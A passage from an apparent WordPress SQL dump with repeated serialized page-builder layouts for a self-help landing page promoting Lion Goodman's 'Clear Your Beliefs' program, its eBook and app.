/></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1042, 1544, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:719:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1233:"[su_tabs active="2"][su_tab title="<b>What You Can Accomplish with Clear Your Beliefs</b> "][su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n[/su_tab]\n\n[su_tab title="<b>How and Why It Works</b>"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1043, 1545, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:843:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a>\n<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> \n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:719:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1233:"[su_tabs active="2"][su_tab title="<b>What You Can Accomplish with Clear Your Beliefs</b> "][su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n[/su_tab]\n\n[su_tab title="<b>How and Why It Works</b>"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1044, 1546, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:372:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:719:"[su_box title="Special Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1233:"[su_tabs active="2"][su_tab title="<b>What You Can Accomplish with Clear Your Beliefs</b> "][su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n[/su_tab]\n\n[su_tab title="<b>How and Why It Works</b>"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your 